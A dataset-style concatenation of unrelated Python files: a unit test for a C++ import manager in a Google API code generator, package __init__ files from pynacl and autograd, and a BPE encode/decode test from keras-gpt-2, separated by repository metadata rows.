# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for cpp_import_manager."""
__author__ = '<EMAIL> (<NAME>)'
from google.apputils import basetest
from googleapis.codegen.cpp_import_manager import CppImportManager
class MockSchema(object):
"""Mock schema used in place of real schema objects."""
def __init__(self):
self._template_values_dict = {}
def SetTemplateValue(self, template_name, template_value):
self._template_values_dict[template_name] = template_value
def GetTemplateValue(self, template_name):
return self._template_values_dict.get(template_name)
class CppImportManagerTest(basetest.TestCase):
def setUp(self):
super(CppImportManagerTest, self).setUp()
self.mock_schema = MockSchema()
self.import_manager = CppImportManager(self.mock_schema)
def testAddImportAndCommit(self):
# Add a com.google import.
com_google_import = '"base/integral_types.h"'
self.assertTrue(self.import_manager.AddImport(com_google_import))
self.assertFalse(self.import_manager.platform_imports)
self.assertFalse(self.import_manager.other_imports)
self.assertTrue(self.import_manager.google_imports)
# There are no platform imports for C++
platform_import = '<string>'
self.assertTrue(self.import_manager.AddImport(platform_import))
self.assertTrue(self.import_manager.platform_imports)
# Add a random thing
other_import = '"Module.h"'
self.import_manager.AddImport(other_import)
# Assert the contents of google, other and java imports.
expected_google_import_set = set()
expected_google_import_set.add(com_google_import)
sorted_expected_google_import_set = sorted(expected_google_import_set)
self.assertEquals(sorted_expected_google_import_set,
list(self.import_manager.google_imports))
self.assertEquals([other_import],
list(self.import_manager.other_imports))
self.assertEquals([platform_import],
list(self.import_manager.platform_imports))
# Assert the contents of class_name_to_qualified_name map.
self.assertEquals(
com_google_import,
self.import_manager._class_name_to_qualified_name[com_google_import])
# Assert that commit import works.
# The import_manager combines the platform and google imports together
# but each segment is first sorted.
expected_import_list = [
sorted([platform_import]) + sorted_expected_google_import_set,
[other_import]]
self.assertEquals(
expected_import_list,
self.mock_schema.GetTemplateValue('importManager').ImportLists())
if __name__ == '__main__':
basetest.main()
|
pynacl/lib/__init__.py
|
cohortfsllc/cohort-cocl2-sandbox
| 2,151 |
63823
|
#!/usr/bin/python
# Copyright (c) 2014 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Unfortunately python does not have a good way to deal with module name
# clashes. The easiest way to get around it is to use a layer of indirection.
# For example, if pynacl.platform needs to use the python root platform module,
# it should import lib instead and use lib.platform.
# List name clashed modules here in alphabetical order
import platform
|
autograd/numpy/__init__.py
|
gautam1858/autograd
| 6,119 |
63893
|
<filename>autograd/numpy/__init__.py<gh_stars>1000+
from __future__ import absolute_import
from .numpy_wrapper import *
from . import numpy_boxes
from . import numpy_vspaces
from . import numpy_vjps
from . import numpy_jvps
from . import linalg
from . import fft
from . import random
|
tests/test_bpe.py
|
Pimax1/keras-gpt-2
| 131 |
63902
|
import os
from unittest import TestCase
from keras_gpt_2 import get_bpe_from_files
class TestBPE(TestCase):
def test_encode_and_decode(self):
current_path = os.path.dirname(os.path.abspath(__file__))
toy_checkpoint_path = os.path.join(current_path, 'toy_checkpoint')
encoder_path = os.path.join(toy_checkpoint_path, 'encoder.json')
vocab_path = os.path.join(toy_checkpoint_path, 'vocab.bpe')
bpe = get_bpe_from_files(encoder_path, vocab_path)
text = 'Power, give me more power!'
indices = bpe.encode(text)
self.assertEqual([13434, 11, 1577, 502, 517, 1176, 0], indices)
self.assertEqual(text, bpe.decode(indices))
self.assertEqual(text, bpe.decode(bpe.encode(text)))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.